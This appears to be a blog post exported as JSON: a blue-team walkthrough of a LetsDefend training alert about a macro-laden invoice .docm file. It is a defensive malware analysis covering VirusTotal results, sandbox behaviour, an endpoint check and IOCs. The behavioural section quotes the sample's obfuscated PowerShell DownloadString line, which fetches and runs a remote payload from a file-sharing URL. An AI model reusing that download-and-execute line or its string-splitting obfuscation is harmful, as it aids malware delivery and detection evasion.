{"id":319,"date":"2026-09-05T17:38:15","date_gmt":"2026-09-05T21:38:15","guid":{"rendered":"https:\/\/securebydefault.io\/blog\/?p=319"},"modified":"2026-09-05T17:38:15","modified_gmt":"2026-09-05T21:38:15","slug":"soc137-malicious-file-script-download-attempt-letsdefend-walkthrough","status":"publish","type":"post","link":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/","title":{"rendered":"SOC137 LetsDefend Walkthrough: Malicious File\/Script Download Attempt"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"376\" src=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/08\/LDefend.jpg\" alt=\"\" class=\"wp-image-254\" srcset=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/08\/LDefend.jpg 720w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/08\/LDefend-300x157.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color has-medium-font-size wp-elements-1 wp-block-paragraph\"><strong>Alert Overview<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<style>\n.alert-table { width: 100%; border-collapse: collapse; font-family: Arial, sans-serif; font-size: 14px; margin-bottom: 20px; }\n.alert-table td { padding: 9px 14px; border-bottom: 1px solid #e5e7eb; vertical-align: middle; }\n.alert-table tr:last-child td { border-bottom: none; }\n.alert-table .label { font-weight: 600; width: 220px; color: #6D28D9; background: #F5F3FF; border-right: 1px solid #e5e7eb; }\n.alert-table .value { color: #1f2937; background: #ffffff; }\n.alert-table .label-red { font-weight: 600; width: 220px; color: #991B1B; background: #FEF2F2; border-right: 1px solid #fecaca; border-bottom: 1px solid #fecaca; }\n.alert-table .value-red { color: #1f2937; background: #FEF2F2; border-bottom: 1px solid #fecaca; }\n<\/style>\n\n<table class=\"alert-table\">\n  <tr>\n    <td class=\"label\">Event ID<\/td>\n    <td class=\"value\">76<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"label\">Severity<\/td>\n    <td class=\"value\">Medium<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"label-red\">Type<\/td>\n    <td class=\"value-red\">Malware<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"label\">Rule Name<\/td>\n    <td class=\"value\">SOC137 &#8211; Malicious File\/Script Download Attempt<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"label\">MITRE ATT&#038;CK<\/td>\n    <td class=\"value\">T1204, T1059.001, T1027, T1055, T1070.004, T1497, T1105<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"label-red\">File Name<\/td>\n    <td class=\"value-red\">INVOICE PACKAGE LINK TO DOWNLOAD.docm<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"label\">File Hash (MD5)<\/td>\n    <td class=\"value\">f2d0c66b801244c059f636d08a474079<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"label\">File Hash (SHA256)<\/td>\n    <td class=\"value\">08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"label\">File Size<\/td>\n    <td class=\"value\">16.66 KB<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"label\">Device Action<\/td>\n    <td class=\"value\">Blocked<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"label\">Source Address<\/td>\n    <td class=\"value\">172.16.17.37<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"label\">Source Hostname<\/td>\n    <td class=\"value\">NicolasPRD<\/td>\n  <\/tr>\n<\/table>\n\n\n\n<p class=\"wp-block-paragraph\">An employee&#8217;s workstation attempted to download a file with one of the least subtle names in the history of malicious documents. When your file is called &#8216;INVOICE PACKAGE LINK TO DOWNLOAD.docm&#8217; and the MD5 hash is literally the filename, the attacker was not losing sleep over staying hidden.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The device action shows Blocked, which is a good start. But blocked does not always mean contained, so the investigation needed to confirm whether the file actually executed before the block took effect and whether any malicious activity occurred on the endpoint.<\/p>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color has-medium-font-size wp-elements-2 wp-block-paragraph\"><strong>Step 1: Case Initialization<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p class=\"wp-block-paragraph\">First step as always: take ownership of the alert and create a ticket to kick off the formal investigation. Then open the playbook and work through it systematically.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"636\" height=\"464\" src=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/create-ticket.png\" alt=\"\" class=\"wp-image-320\" srcset=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/create-ticket.png 636w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/create-ticket-300x219.png 300w\" sizes=\"auto, (max-width: 636px) 100vw, 636px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"258\" src=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/incident-details-1024x258.png\" alt=\"\" class=\"wp-image-321\" srcset=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/incident-details-1024x258.png 1024w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/incident-details-300x76.png 300w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/incident-details-765x193.png 765w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/incident-details.png 1368w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color has-medium-font-size wp-elements-3 wp-block-paragraph\"><strong>Step 2: File Analysis<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p class=\"wp-block-paragraph\">The MD5 hash f2d0c66b801244c059f636d08a474079 is already provided in the alert and is also the filename of the download, which saves a step. We can plug this directly into VirusTotal without needing to download and hash the file manually.<\/p>\n\n\n\n<style>\n.callout-cyan { background: #ECFEFF; border-left: 4px solid #0E7490; border-radius: 4px; padding: 14px 16px; font-family: Arial, sans-serif; font-size: 14px; line-height: 1.6; color: #1f2937; margin-bottom: 20px; }\n.callout-cyan .callout-title { font-weight: 700; color: #0E7490; margin-bottom: 6px; }\n<\/style>\n\n<div class=\"callout-cyan\">\n  <div class=\"callout-title\">Note on hash formats<\/div>\n  The alert provides the MD5 hash. VirusTotal displays the SHA256 hash (08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873) in its header. Both hashes refer to the same file. MD5 is shorter and commonly used in alerts. SHA256 is more collision-resistant and preferred in modern security tooling.\n<\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"688\" src=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/virus_total-1024x688.png\" alt=\"\" class=\"wp-image-322\" srcset=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/virus_total-1024x688.png 1024w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/virus_total-768x516.png 768w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/virus_total-300x202.png 300w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/virus_total-1536x1033.png 1536w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/virus_total.png 1614w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The results were not ambiguous. The file was flagged as malicious by 40 out of 65 security vendors. At that detection rate this is not a gray area.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The VirusTotal tags visible below the hash tell a story on their own: macros, auto-open, calls-wmi, macro-run-file, url-pattern, run-file, powershell, and detect-debug-environment. That last tag is particularly significant and worth remembering for the behavioral analysis section.<\/p>\n\n\n\n<style>\n.callout-purple { background: #F5F3FF; border-left: 4px solid #7C3AED; border-radius: 4px; padding: 14px 16px; font-family: Arial, sans-serif; font-size: 14px; line-height: 1.6; color: #1f2937; margin-bottom: 20px; }\n.callout-purple .callout-title { font-weight: 700; color: #7C3AED; margin-bottom: 6px; }\n<\/style>\n\n<div class=\"callout-purple\">\n  <div class=\"callout-title\">What is a .docm file?<\/div>\n  A .docm file is a macro-enabled Microsoft Word document. Unlike a standard .docx, a .docm can contain macros: small programs that execute automatically when the document is opened. Attackers abuse this capability because macros have legitimate business uses, making it difficult for organizations to disable them entirely. The .docm extension is a signal worth treating as suspicious when received unexpectedly.\n<\/div>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color has-medium-font-size wp-elements-4 wp-block-paragraph\"><strong>Step 3: Behavioral Analysis<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p class=\"wp-block-paragraph\">Confirming the file is malicious is only half the job. Understanding how it works tells us what it was trying to do and whether it succeeded. The VirusTotal Behavior tab shows the macro in action inside a sandbox environment.<br><\/p>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color wp-elements-5 wp-block-paragraph\"><strong>Shell Commands and Obfuscated PowerShell<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The macro contains a function called AutoOpen() that fires automatically the moment the document is opened, without any additional user interaction. The function uses PowerShell to download a secondary payload from a remote URL. The command is obfuscated to evade signature-based detection:<br><\/p>\n\n\n\n<style>\n.code-block { background: #1E1E2E; border-radius: 6px; padding: 16px 20px; font-family: 'Courier New', monospace; font-size: 13px; line-height: 1.8; color: #00D4FF; margin-bottom: 20px; overflow-x: auto; white-space: pre-wrap; word-break: break-all; }\n<\/style>\n\n<div class=\"code-block\">((&#8216;D&#8217;+&#8217;o&#8217;+&#8217;w&#8217;+&#8217;n&#8217;+&#8217;l&#8217;+&#8217;o&#8217;+&#8217;a&#8217;+&#8217;d&#8217;+&#8217;S&#8217;+&#8217;t&#8217;+&#8217;r&#8217;+&#8217;i&#8217;+&#8217;n&#8217;+&#8217;g&#8217;)).Invoke((&#8216;https:\/\/filetransfer.io\/data-package\/UR2whuBv\/download&#8217;))<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">Pieced together that is DownloadString, a PowerShell method that pulls content from a URL and executes it immediately. The string obfuscation splits recognizable commands into individual characters joined by plus signs, which bypasses some static analysis tools that look for known bad patterns.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"347\" src=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/powershell-obfuscated-1-1024x347.png\" alt=\"\" class=\"wp-image-324\" srcset=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/powershell-obfuscated-1-1024x347.png 1024w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/powershell-obfuscated-1-300x102.png 300w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/powershell-obfuscated-1-767x260.png 767w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/powershell-obfuscated-1-1536x521.png 1536w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/powershell-obfuscated-1.png 1617w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color wp-elements-6 wp-block-paragraph\">Sandbox Evasion: detect-debug-environment<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">One of the VirusTotal behavioral tags flagged on this file is detect-debug-environment. This means the malware actively checks whether it is running inside a sandbox or analysis environment before executing its payload. If it detects a sandbox it may behave differently or not run at all.<br><\/p>\n\n\n\n<style>\n.callout-amber { background: #FFFBEB; border-left: 4px solid #D97706; border-radius: 4px; padding: 14px 16px; font-family: Arial, sans-serif; font-size: 14px; line-height: 1.6; color: #1f2937; margin-bottom: 20px; }\n.callout-amber .callout-title { font-weight: 700; color: #D97706; margin-bottom: 6px; }\n<\/style>\n\n<div class=\"callout-amber\">\n  <div class=\"callout-title\">Why sandbox evasion matters<\/div>\n  Most automated malware analysis runs files in sandboxes to observe their behavior safely. A file that detects the sandbox and stays dormant will appear clean in automated analysis even though it is malicious. This is a more sophisticated technique than simple string obfuscation and indicates the attacker put real effort into evading detection. It also means behavioral analysis results may be incomplete since the malware may have held back some of its capabilities.\n<\/div>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color wp-elements-7 wp-block-paragraph\">Registry Keys Deleted: Anti-Forensics<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The VirusTotal behavioral analysis shows the macro deleting several registry keys including Microsoft Office Word File MRU (Most Recently Used) entries. MRU entries record which files were recently opened by the user.<br><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"742\" height=\"294\" src=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/registry-keys-deleted.png\" alt=\"\" class=\"wp-image-325\" srcset=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/registry-keys-deleted.png 742w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/registry-keys-deleted-300x119.png 300w\" sizes=\"auto, (max-width: 742px) 100vw, 742px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Deleting MRU entries is a classic anti-forensics technique. The attacker is trying to erase evidence that the malicious document was ever opened on the system. An investigator checking recently opened files on the endpoint would find the record had been wiped. The WmiApRpl performance counter key deletions are also notable as these can interfere with system monitoring and performance logging.<br><\/p>\n\n\n\n<style>\n.callout { border-radius: 4px; padding: 14px 16px; margin-bottom: 16px; font-family: Arial, sans-serif; font-size: 14px; line-height: 1.6; }\n.callout-title { font-weight: 700; margin-bottom: 6px; }\n.callout-red { background: #FEE2E2; border-left: 4px solid #DC2626; }\n.callout-red .callout-title { color: #DC2626; }\n.callout-red p { color: #1f2937; margin: 0; }\n<\/style>\n\n<div class=\"callout callout-red\">\n  <div class=\"callout-title\">Anti-Forensics in practice<\/div>\n  <p>Anti-forensics refers to techniques attackers use to destroy, modify, or hide evidence of their activity. Deleting MRU entries, clearing event logs, and timestomping are all common examples. When you see anti-forensics behavior in a malware sample it is a strong indicator that the attacker expected the infection to be investigated and prepared accordingly. It also strengthens the True Positive verdict because legitimate files do not delete their own access records.<\/p>\n<\/div>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color wp-elements-8 wp-block-paragraph\">Process Injection<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The behavioral analysis shows the macro injecting into C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe. Process injection means the malware inserts its code into a legitimate running Windows process rather than running as its own visible process.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"462\" height=\"70\" src=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/processes-injected.png\" alt=\"\" class=\"wp-image-326\" srcset=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/processes-injected.png 462w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/processes-injected-300x45.png 300w\" sizes=\"auto, (max-width: 462px) 100vw, 462px\" \/><\/figure>\n\n\n\n<style>\n.callout { border-radius: 4px; padding: 14px 16px; margin-bottom: 16px; font-family: Arial, sans-serif; font-size: 14px; line-height: 1.6; }\n.callout-title { font-weight: 700; margin-bottom: 6px; }\n.callout-red { background: #FEE2E2; border-left: 4px solid #DC2626; }\n.callout-red .callout-title { color: #DC2626; }\n.callout-red p { color: #1f2937; margin: 0; }\n<\/style>\n\n<div class=\"callout callout-red\">\n  <div class=\"callout-title\">Why process injection is significant<\/div>\n  <p>Running malicious code inside a legitimate process like powershell.exe makes it much harder to detect. Security tools that look for suspicious process names or unexpected executables will see powershell.exe, a completely normal Windows process, rather than the malware itself. Process injection is a well-documented defense evasion technique and its presence here indicates a more capable piece of malware than a simple dropper.<\/p>\n<\/div>\n\n\n\n<style>\n.attack-chain-section { font-family: Arial, sans-serif; margin-bottom: 20px; }\n.attack-chain-title { font-weight: 700; color: #1D4ED8; font-size: 15px; margin-bottom: 10px; }\n.attack-chain { display: flex; align-items: stretch; gap: 0; flex-wrap: wrap; }\n.chain-step { background: #FEF2F2; border: 1px solid #FECACA; padding: 10px 12px; font-size: 13px; font-weight: 600; color: #991B1B; text-align: center; flex: 1; min-width: 100px; display: flex; align-items: center; justify-content: center; line-height: 1.4; }\n.chain-arrow { display: flex; align-items: center; justify-content: center; color: #991B1B; font-weight: 700; font-size: 18px; padding: 0 4px; flex-shrink: 0; }\n<\/style>\n\n<div class=\"attack-chain-section\">\n  <div class=\"attack-chain-title\">The Full Attack Chain<\/div>\n  <div class=\"attack-chain\">\n    <div class=\"chain-step\">User opens .docm file<\/div>\n    <div class=\"chain-arrow\">&gt;<\/div>\n    <div class=\"chain-step\">AutoOpen() fires, checks for sandbox<\/div>\n    <div class=\"chain-arrow\">&gt;<\/div>\n    <div class=\"chain-step\">Obfuscated PowerShell downloads payload<\/div>\n    <div class=\"chain-arrow\">&gt;<\/div>\n    <div class=\"chain-step\">Injects into powershell.exe, deletes MRU keys<\/div>\n    <div class=\"chain-arrow\">&gt;<\/div>\n    <div class=\"chain-step\">C2 contacted at 178.175.67.109<\/div>\n  <\/div>\n<\/div>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color has-medium-font-size wp-elements-9 wp-block-paragraph\">Step 4: Endpoint Investigation<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p class=\"wp-block-paragraph\">With the file confirmed as malicious and the behavioral analysis complete, the next step is checking NicolasPRD in Endpoint Security to determine whether the block happened before or after execution and whether any of the behavioral indicators showed up on the live endpoint.<br><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"575\" src=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/endpoint_process-1024x575.png\" alt=\"\" class=\"wp-image-327\" srcset=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/endpoint_process-1024x575.png 1024w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/endpoint_process-300x169.png 300w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/endpoint_process-767x431.png 767w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/endpoint_process.png 1107w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"618\" src=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/endpoint_terminal-1024x618.png\" alt=\"\" class=\"wp-image-328\" srcset=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/endpoint_terminal-1024x618.png 1024w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/endpoint_terminal-300x181.png 300w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/endpoint_terminal-768x463.png 768w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/endpoint_terminal.png 1048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The process list and terminal history showed nothing suspicious. No unusual processes spawned, no signs of the PowerShell payload executing, and no network connections to the C2 infrastructure identified at 178.175.67.109. The block appears to have been effective before any payload could run.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Log Management was also checked and returned nothing related to this event, which is consistent with the file being stopped before execution could complete.<\/p>\n\n\n\n<style>\n.callout-cyan { background: #ECFEFF; border-left: 4px solid #0E7490; border-radius: 4px; padding: 14px 16px; font-family: Arial, sans-serif; font-size: 14px; line-height: 1.6; color: #1f2937; margin-bottom: 20px; }\n.callout-cyan .callout-title { font-weight: 700; color: #0E7490; margin-bottom: 6px; }\n<\/style>\n\n<div class=\"callout-cyan\">\n  <div class=\"callout-title\">Why check the endpoint even when the device action was Blocked?<\/div>\n  Blocked does not always mean the file never ran. Some endpoint protection tools block network communication or file writes but the initial macro code may have already executed. Always verify the endpoint is clean rather than assuming the block was early enough to prevent all execution. In this case the endpoint was clean, but the check is never optional.\n<\/div>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color has-medium-font-size wp-elements-10 wp-block-paragraph\">Playbook Answers<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<style>\n.playbook-table { width: 100%; border-collapse: collapse; font-family: Arial, sans-serif; font-size: 14px; margin-bottom: 20px; }\n.playbook-table th { background: #1A1A2E; color: #ffffff; font-weight: 600; padding: 10px 14px; text-align: left; }\n.playbook-table td { padding: 10px 14px; border-bottom: 1px solid #e5e7eb; vertical-align: middle; }\n.playbook-table tr:last-child td { border-bottom: none; }\n.playbook-table tr:nth-child(odd) td { background: #F9FAFB; }\n.playbook-table tr:nth-child(even) td { background: #ffffff; }\n.playbook-table .verdict-row td { background: #F0FDF4 !important; }\n.playbook-table .verdict-answer { color: #065F46; font-weight: 700; }\n<\/style>\n\n<table class=\"playbook-table\">\n  <tr>\n    <th>Playbook Question<\/th>\n    <th>Answer<\/th>\n  <\/tr>\n  <tr>\n    <td>Select Threat Indicator<\/td>\n    <td>Unknown or unexpected outgoing internet traffic<\/td>\n  <\/tr>\n  <tr>\n    <td>Malware Quarantined\/Cleaned?<\/td>\n    <td>Quarantined<\/td>\n  <\/tr>\n  <tr>\n    <td>Analyze Malware<\/td>\n    <td>Malicious<\/td>\n  <\/tr>\n  <tr>\n    <td>Check If Someone Requested the C2<\/td>\n    <td>Not accessed &#8211; endpoint clean<\/td>\n  <\/tr>\n  <tr class=\"verdict-row\">\n    <td>Final Verdict<\/td>\n    <td class=\"verdict-answer\">True Positive<\/td>\n  <\/tr>\n<\/table>\n\n\n\n<p class=\"wp-block-paragraph\">The threat indicator is &#8216;Unknown or unexpected outgoing internet traffic&#8217; rather than &#8216;Other&#8217; because the macro&#8217;s entire purpose was to initiate an outbound connection to filetransfer.io to download a secondary payload. That is unexpected outgoing traffic from NicolasPRD and the most accurate indicator from the available options.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"373\" src=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/final-1024x373.png\" alt=\"\" class=\"wp-image-329\" srcset=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/final-1024x373.png 1024w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/final-300x109.png 300w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/final-766x279.png 766w, https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/09\/final.png 1277w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color has-medium-font-size wp-elements-11 wp-block-paragraph\">MITRE ATT&amp;CK Techniques Identified<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<style>\n.mitre-table { width: 100%; border-collapse: collapse; font-family: Arial, sans-serif; font-size: 14px; margin-bottom: 20px; }\n.mitre-table th { background: #1A1A2E; color: #ffffff; font-weight: 600; padding: 10px 14px; text-align: left; }\n.mitre-table td { padding: 10px 14px; border-bottom: 1px solid #e5e7eb; vertical-align: middle; }\n.mitre-table tr:last-child td { border-bottom: none; }\n.mitre-table tr:nth-child(odd) td { background: #F9FAFB; }\n.mitre-table tr:nth-child(even) td { background: #ffffff; }\n.mitre-table .tid { color: #1D4ED8; font-weight: 700; font-family: monospace; }\n<\/style>\n\n<table class=\"mitre-table\">\n  <tr>\n    <th>Technique ID<\/th>\n    <th>Technique Name<\/th>\n    <th>Tactic<\/th>\n  <\/tr>\n  <tr>\n    <td class=\"tid\">T1204<\/td>\n    <td>User Execution<\/td>\n    <td>Execution<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"tid\">T1204.002<\/td>\n    <td>User Execution: Malicious File<\/td>\n    <td>Execution<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"tid\">T1059.001<\/td>\n    <td>Command and Scripting Interpreter: PowerShell<\/td>\n    <td>Execution<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"tid\">T1027<\/td>\n    <td>Obfuscated Files or Information<\/td>\n    <td>Defense Evasion<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"tid\">T1055<\/td>\n    <td>Process Injection<\/td>\n    <td>Defense Evasion, Privilege Escalation<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"tid\">T1070.004<\/td>\n    <td>Indicator Removal: File Deletion (MRU)<\/td>\n    <td>Defense Evasion<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"tid\">T1497<\/td>\n    <td>Virtualization\/Sandbox Evasion<\/td>\n    <td>Defense Evasion, Discovery<\/td>\n  <\/tr>\n  <tr>\n    <td class=\"tid\">T1105<\/td>\n    <td>Ingress Tool Transfer<\/td>\n    <td>Command and Control<\/td>\n  <\/tr>\n<\/table>\n\n\n\n<p class=\"has-ast-global-color-2-color has-text-color has-link-color has-medium-font-size wp-elements-12 wp-block-paragraph\">Why This Attack Patter Still Works<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p class=\"wp-block-paragraph\">Macro-enabled Office documents have been a reliable malware delivery vehicle for decades and they keep appearing in the wild because the technique exploits human behavior rather than technical vulnerabilities. Most organizations cannot disable macros entirely because legitimate business processes depend on them.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">What makes this particular sample more sophisticated than a basic macro dropper is the layered evasion. The string obfuscation bypasses static analysis. The sandbox detection bypasses dynamic analysis. The process injection hides the payload inside a legitimate process. The MRU deletion removes forensic evidence. Each technique is individually well known but the combination makes this harder to catch and harder to investigate after the fact.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The defenses that matter most here are user awareness training around invoice-themed lures, macro execution policies that require explicit approval before macros can run, and endpoint protection that can detect PowerShell download behaviors and process injection even when the initial file passes inspection.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">And maybe a policy about not opening files named &#8216;INVOICE PACKAGE LINK TO DOWNLOAD&#8217; from unknown senders. The attacker made at least one mistake.<\/p>\n\n\n\n<style>\n.callout { border-radius: 4px; padding: 14px 16px; margin-bottom: 16px; font-family: Arial, sans-serif; font-size: 14px; line-height: 1.6; }\n.callout-title { font-weight: 700; margin-bottom: 6px; }\n.callout-green { background: #D1FAE5; border-left: 4px solid #059669; }\n.callout-green .callout-title { color: #059669; }\n.callout-green p { color: #1f2937; margin: 0; }\n<\/style>\n\n<div class=\"callout callout-green\">\n  <div class=\"callout-title\">Key IOCs from This Investigation\n<\/div>\n  <p>MD5: f2d0c66b801244c059f636d08a474079 | SHA256: 08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873 | C2 IP: 178.175.67.109 | Download URL: https:\/\/filetransfer.io\/data-package\/UR2whuBv\/download | Source host: NicolasPRD (172.16.17.37)\n<\/p>\n<\/div>\n\n\n\n<style>\n.author-bio { display: flex; align-items: flex-start; gap: 16px; background: #050C18; border-radius: 8px; padding: 20px; font-family: Arial, sans-serif; margin-bottom: 20px; border: 1px solid #0D1E35; }\n.author-avatar { width: 72px; height: 72px; border-radius: 50%; background: #0D1E35; border: 2px solid #00D4FF; flex-shrink: 0; display: flex; align-items: center; justify-content: center; font-size: 26px; font-weight: 700; color: #00D4FF; font-family: monospace; }\n.author-content { flex: 1; }\n.author-name { font-size: 16px; font-weight: 700; color: #ffffff; margin: 0 0 2px 0; }\n.author-title { font-size: 12px; color: #00D4FF; margin: 0 0 10px 0; letter-spacing: 0.04em; }\n.author-text { font-size: 13.5px; color: #94A3B8; line-height: 1.6; margin: 0 0 12px 0; }\n.author-links { display: flex; gap: 10px; flex-wrap: wrap; }\n.author-link { font-size: 12px; font-weight: 600; padding: 4px 12px; border-radius: 20px; text-decoration: none; }\n.link-site { background: #00D4FF; color: #050C18; }\n.link-linkedin { background: #0D1E35; color: #00D4FF; border: 1px solid #00D4FF; }\n.link-github { background: #0D1E35; color: #00D4FF; border: 1px solid #00D4FF; }\n<\/style>\n\n<div class=\"author-bio\">\n  <div class=\"author-avatar\">RM<\/div>\n  <div class=\"author-content\">\n    <p class=\"author-name\">Ron Mercier<\/p>\n    <p class=\"author-title\">CLOUD &nbsp;\u00b7&nbsp; CYBERSECURITY &nbsp;\u00b7&nbsp; SECUREBYDEFAULT.IO<\/p>\n    <p class=\"author-text\">Ron is a Cloud and Cybersecurity Engineer and the founder of SecureByDefault.io. He writes hands-on security walkthroughs from real investigations, not theory. Follow along for practical blue team content, 